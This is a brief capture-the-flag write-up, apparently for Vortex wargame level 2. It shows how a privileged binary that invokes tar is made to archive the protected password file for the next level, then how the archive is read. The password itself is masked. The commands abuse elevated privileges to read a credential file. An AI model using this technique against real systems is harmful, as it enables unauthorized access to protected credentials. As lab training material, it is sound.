You can find the description of this level here.
It is not hard to figure out, that the process which calls tar command, has the privileges to access the file, which contains the password we need.
So simply calling it with the file we need, and two non-existing file names as parameters:
/vortex/level2 /etc/vortex_pass/vortex3 X Y
will result a tar archive which hopefully contains our file. Lets check it:
ls -lad /tmp/ownership.$$.tar ls: cannot access /tmp/ownership.11603.tar: No such file or directory
Something went wrong, bash resolves $$ to the pid of the actual shell. Lets ‘protect’ the filename:
ls -lad '/tmp/ownership.$$.tar' -rw-r--r-- 1 vortex3 vortex2 10240 Nov 19 00:51 /tmp/ownership.$$.tar
Ok, we have the file! Lets dump its content to the console:
tar xf '/tmp/ownership.$$.tar' -O ********